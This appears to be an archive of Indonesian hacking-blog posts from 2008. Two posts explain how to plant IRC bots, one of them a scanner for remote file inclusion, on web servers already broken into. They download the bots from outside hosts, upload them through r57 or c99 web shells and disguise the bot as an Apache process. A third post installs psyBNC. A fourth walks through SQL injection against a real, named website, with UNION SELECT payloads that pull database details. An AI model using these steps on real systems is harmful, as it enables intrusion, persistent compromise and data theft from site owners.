Senin, 28 Juli 2008

Cara Membuat Bot Scan RFI di mIRC

1. Copy paste dan simpan script yang saya beri di geocities ato web anda kedalam
format txt, ato anda juga bisa langsung menggunakan milik saya

2. Masuk ke shell anda

3. cari direktori yang memberikan permission 777 dengan command “find / -perm 777 -type d”

4. jika ga ada, langsung aja menuju direktori /tmp ato /var/tmp

5. wget script bot dari web geocities saya ato dari tempat anda. saya pake contoh punya rekan saya, jadi commandnya “wget pluto5yc04.alkadr.com/IOS/Users/pluto5yc04.alkadr.com/Files/ngedan.txt”

6. jika ga berhasil, coba pake command lwp-download tapi dengan url yang lengkap, commandnya “lwp-download http://pluto5yc04.alkadr.com/IOS/Users/pluto5yc04.alkadr.com/Files/ngedan.txt”

7. kalo ga bisa juga, pakailah fitur uploadnya karena saya menggunakan r57 ato c99. dan uploadlah script botnya dengan fitur tersebut. jika belum punya filenya, donlot aja dari http://pluto5yc04.alkadr.com/IOS/Users/pluto5yc04.alkadr.com/Files/ngedan.txt

8. Saya anggap script tersebut udah di upload, maka jalankan commandnya “perl namafile server nick ident channel owner fakeproccess” contohnya ” perl scan.txt irc.dal.net bugzz bug balihackerlink LeNK /usr/sbin/apache”

9. Jika berhasil, di shell anda akan keluar tulisan.. dan di channel yang anda join, bot akan pm anda dan beri salam “you are my master”

10. Untuk mengetahui command yang dipake, pm bot dan ketik !cmdx @help

11. Silahkan dipergunakan sebaik mungkin (untuk cari targetlah masa situs bokep)


KETERANGAN:
1. Ini adalah tutor untuk pembuatan bot scan RFI pada web hasil inject
2. Tutor ini hanya berjalan pada mesin Linux ato keluarga UNIX
3. Semua command di atas tanpa tanda petik dua (”)

SEMOGA MEMBANTU TEMEN-TEMEN........


sebenarnya, jika bot sudah masuk ke channel dan bot telah pm/pv anda dengan kata “You are my master” itu tandanya bot telah jalan. Jadi coba dengan command !cmdx @help saat pv/pm bot untuk melihat list helpnya. Script ini masih berfungsi setelah saya coba..


Thanks To YogyaCarderLink@DALnet
- JaLi-
- AnaK_Naga_
- g0nz
- CCard_boys
- Sabreetooth

Senin, 28 April 2008

Cara Membuat Bot IRC di Shell

Seperti langkah pembuatan psyBNC yang saya tulis sebelumnya, pembuatan bot di IRC tidak berbeda jauh. Bot adalah sebutan pendek untuk sebuah robot. kegunaannya adalah dititikberatkan untuk penjagaan channel dan juga untuk meramaikan channel.

Tapi banyak juga bot yang dibuat untuk melakukan sebuah tindakan khusus, seperti bot game, bot cek ip, bot cerita, bot bawel, bot RFI scan dan masih banyak lagi. Namun yang akan saya jabarkan disini adalah bot umum yang mempunyai kegunaan untuk menjaga channel.

OK… biar ga panjang lebar lagi, ini adalah langkah-langkahnya :

  1. masuk ke shell anda
  2. cari direktori yang memberikan permission 777 dengan command “find / -perm 777 -type d”
  3. jika ga ada, langsung aja menuju direktori /tmp ato /var/tmp
  4. wget file bot dari web geocities saya. commandnyawget geocities.com/rah_polenk/files/bot.tar.gz”
  5. jika ga berhasil, coba pake command lwp-download tapi dengan url yang lengkap, commandnyalwp-download http://www.geocities.com/rah_polenk/files/bot.tar.gz”
  6. kalo ga bisa juga, pakailah script injectkan r57 ato c99 sehingga ada fitur uploadnya. dan uploadlah file psynya dengan fitur tersebut. jika belum punya filenya, donlot aja dari geocities.com/rah_polenk/files/bot.tar.gz
  7. saya anggap udah terupload ke server ya.. maka harus diextract dulu file tersebut dengan command “tar -zvxf bot.tar.gz”
  8. setelah diextract, masuk ke direktori .dat dengan command “cd .dat
  9. kemudian masuk lagi ke direktori scripts dengan command “cd scripts”
  10. nah.. sekarang kita membutuhkan file ary.tcl untuk dapat menjalankan botnya, wget aja dari web geocities saya. commandnyawget geocities.com/rah_polenk/files/ary.txt”
  11. kalo ga bisa, pake command lwp-download ato upload saja seperti cara 5 dan 6
  12. ubah namanya dengan command “mv ary.txt ary.tclmaka namanya akan berubah ke ary.tcl
  13. kembali ke direktori .dat dengan command”cd ..”
  14. sekarang kita buat file confignya, commandnya adalah “./nadya namafile.config nickbot identbot IPshell channel(tanpa tanda #) nickownercontohnya adalah “./nadya bot.txt LeNK-BoT botgue 66.66.66.66 balihackerlink LeNK
  15. kalo ga tau IP dari web injectkan, masuk ke IRC dan ketik “/dns domainwebcontohnya “/dns yahoo.com” maka cek distatus box akan ada ip adressnya pakailah ip itu.
  16. setelah itu, jalankan file config yang sudah di buat dengan command “./eggdrop -m namafile.configkarena contoh di atas file confignya saya namakan bot.txt maka commandnya adalah “./eggdrop -m bot.txt
  17. nah.. masuk ke irc dan lihat bot anda muncul di channel yang telah ditentukan
  18. kemudian pv/pm bot anda
  19. ketik “pass password” contohnya “pass lenkganteng” . itu adalah untuk memasukkan password anda.
  20. kemudian kembali ke channel dan ketik “!authmaka bot telah menjadi milik anda

Ket:

  1. Ini adalah tutor untuk pembuatan bot pada web hasil inject
  2. Tutor ini hanya berjalan pada mesin Linux ato keluarga UNIX
  3. Semua command di atas tanpa tanda petik dua (”)
  4. Bot ini hanya untuk di server DALnet

sekian tutorial singkat pembuatan bot IRC

Jumat, 28 Maret 2008

Cara Installasi psyBNC

Ditujukan buat anda-anda semua yang belum tau cara membuat psyBNC
apa itu psyBNC ?
psyBNC adalah sejenis aplikasi /program yang di install di dalam mesin komputer kita yang be operating system linux,windows, dll, sehingga NickName kita di MIRC akan tetap ada walaupun kita tidak online..

Berikut Langkah-langkah membuat psyBNC untuk operating system Linux :

1. Cari Source/File Psybnc
di : www.psybnc.net
2. download source/file psybnc :
cth : wget http://www.psybnc.net/psyBNC-2.3.2-7.tar.gz
3. Setelah kita mendownload source/file tadi, lakukan extrak terhadap file psyBNC-2.3.2-7.tar.gz
caranya : tar -zvxf psyBNC-2.3.2-7.tar.gz
4. Setelah proses ekstrak selesai, masuk ke direktory psybnc nya..
cara nya : cd psybnc
5. Setelah masuk ke direktory psybnc, lakukan proses compile terhadap source/file nya tadi
cara nya : make
6. setelah compile nya selesai, lakukan pengeeditan untuk config psybnc nya, dimana config psybnc tersebut
terdapat beberapa contoh, misal :
PSYBNC.SYSTEM.PORT1=31337
PSYBNC.SYSTEM.HOST1=*
PSYBNC.HOSTALLOWS.ENTRY0=*;*
dimana Port default psybnc itu 31337, kita bisa mengedit nya..terserah apa yang kita inginkan..misal nya 2006 atau yang lain.
untuk melakukan pengeditan ini, kita bisa menggunakan editor di linux, seperti “vi” “pico”
cth: pico psybnc.conf
untuk keluar dari editor pico, tekan ctrl+x dan jangan lupa men save apa yang sudah kita edit tadi….
7. Setelah editing selesai, kita bisa jalankan program psybnc nya…
caranya : ./psybnc

hasil nya :

.-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-.
,—-.,—-.,-. ,-.,—.,–. ,-.,—-.
| O || ,-’ \ \/ / | o || \| || ,–’
| _/ _\ \ \ / | o< | |\ || |__
|_| |____/ |__| |___||_| \_| \___|
Version 2.3.2-7 (c) 1999-2003
the most psychoid
and the cool lam3rz Group IRCnet

`-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=tCl=-’
Configuration File: psybnc.conf
Language File: psyBNC Language File - English
No logfile specified, logging to log/psybnc.log
Listening on: 0.0.0.0 port 2006
psyBNC2.3.2-7-cBtITLdDMSNpE started (PID 99986)

Oke…dech…selamat mencoba..!!

Minggu, 02 Maret 2008

Cara Hacking Dengan Sql Injection

[x] Apa itu SQL injection?

SQL injection adalah teknik eksploitasi database via remote.
dengan menggunakan SQL Query [perintah2 SQL] kita bisa mengetahui isi dari database target.
lebih lanjut bisa dibaca disini http://en.wikipedia.org/wiki/SQL_injection
cape ngejelasin ne.. panjang amit. :)


[x] Bagaimana cara mendeteksi SQL Injection pada sebuah site?

ada banyak cara untuk mendeteksi SQL Injection pada sebuah site.
salah satunya adalah dengan menggunakan command AND 1=1 dan AND 1=2
AND 1=1 <=- keadaan TRUE
AND 1=2 <=- keadaan FALSE
masih banyak cara2 yang lain untuk mendeteksi SQL Injection, dalam tutor ini gw hanya menggunakan cara ini.
langsung contoh target ajah ya...
googling dengan keyword "product_details.php?product_id="
nah pasti bakal keluar target2nya kan? kita ambil contoh target berikut.

http://www.ntlabs.co.uk/product_details.php?product_id=17

sekarang kita akan mencoba mendeteksi SQL Injection pada target diatas dengan menggunakan command2 tadi.

[1] http://www.ntlabs.co.uk/product_details.php?product_id=17 AND 1=1
[2] http://www.ntlabs.co.uk/product_details.php?product_id=17 AND 1=2

apa perbedaan antara URL pertama dan URL kedua?
dalam kondisi AND 1=1 [TRUE] halaman sitenya tidak akan mengalami perubahan sedangkan
dalam kondisi AND 1=2 [FALSE] halaman sitenya pasti akan berubah, baik itu ada pesan error ataupun tidak.
ini berarti site tersebut bisa kita eksploitasi dengan menggunakan SQL Injection.


[x] Bagaimana mencari jumlah TABLE dalam database?

ada banyak cara juga dalam mencari jumlah TABLE dalam database target, dalam tutor ini gw make command ORDER BY.
angka dibelakang comamand ORDER BY adalah jumlah TABLE, kita mulai dengan angka 1.

http://www.ntlabs.co.uk/product_details.php?product_id=17 ORDER BY 1/*

setelah dirun ternyata halamannya tidak ada perubahan atau halamannya masih dalam kondisi TRUE, itu berarti TABLE lebih dari 1.
langsung ke angka 10 ajah biar cepet. :)

http://www.ntlabs.co.uk/product_details.php?product_id=17 ORDER BY 10/*

apa yang terjadi? ternyata halamannya berubah atau halaman sudah dalam kondisi FALSE, berarti TABLE tidak lebih dari 10.
jadi range TABLE dalam databasenya adalah dari 1 - 10.
sekarang kita turunin angkanya jadi 9.

http://www.ntlabs.co.uk/product_details.php?product_id=17 ORDER BY 9/*
http://www.ntlabs.co.uk/product_details.php?product_id=17 ORDER BY 8/*
http://www.ntlabs.co.uk/product_details.php?product_id=17 ORDER BY 7/*
http://www.ntlabs.co.uk/product_details.php?product_id=17 ORDER BY 6/*
http://www.ntlabs.co.uk/product_details.php?product_id=17 ORDER BY 5/*

ternyata masih FALSE juga, so kita turunin lagi angkanya sampai dapat kondisi TRUE

http://www.ntlabs.co.uk/product_details.php?product_id=17 ORDER BY 4/*

ternyata pada angka 4 halaman kembali pada kondisi TRUE. jadi bisa kita simpulkan bahwa ada 4 TABLE didalam database target.
koq bisa tau ada 4 TABLE sih? karena pada angka 4 kondisi halaman TRUE sedangkan pada angka 5 kondisi halaman sudah FALSE.
ga percaya? kita buktikan dengan menggunakan command UNION SELECT.

[1] http://www.ntlabs.co.uk/product_details.php?product_id=17 UNION SELECT 1,2,3,4/*
[2] http://www.ntlabs.co.uk/product_details.php?product_id=17 UNION SELECT 1,2,3,4,5/*

lagi2 kondisi TRUE pada URL pertama dan kondisi FALSE pada URL kedua.
benarkan? :p


[x] Magic number? [what the f*ck]

apa itu magic number?
magic number adalah angka2 yang akan keluar pada halaman site, angka2 ini akan dipakai untuk memasukkan SQL Query [perintah2 SQL]
bagaimana cara mengeluarkan magic numbernya?
caranya yaitu dengan menambahkan tanda - didepan angka setelah variabel. dalam tutor ini yaitu angka 17. [product_details.php?product_id=-17]

http://www.ntlabs.co.uk/product_details.php?product_id=-17 UNION SELECT 1,2,3,4/*

angka2 berapa ajah yang keluar pada halaman site?
yup ada angka 2, 3 dan 4. jadi angka2 ini yang akan kita pakai untuk memasukkan SQL Query [perintah2 SQL].
misalnya untuk melihat versi dari database kita dapat menggunakan perintah version().

[1] http://www.ntlabs.co.uk/product_details.php?product_id=-17 UNION SELECT 1,2,version(),4/*
[2] http://www.ntlabs.co.uk/product_details.php?product_id=-17 UNION SELECT 1,database(),version(),user()/*

jadi magic number yang udah dikeluarin tadi diganti dengan perintah2 SQL. ngerti ora? xixixi...
kurang lebih seperti itu cara untuk mendeteksi SQL Injection Vulnerability pada sebuah site atau source.
any question? post comment atau googling ajah yak!! :)


Sumber bacaan : http://www.rajakoya.com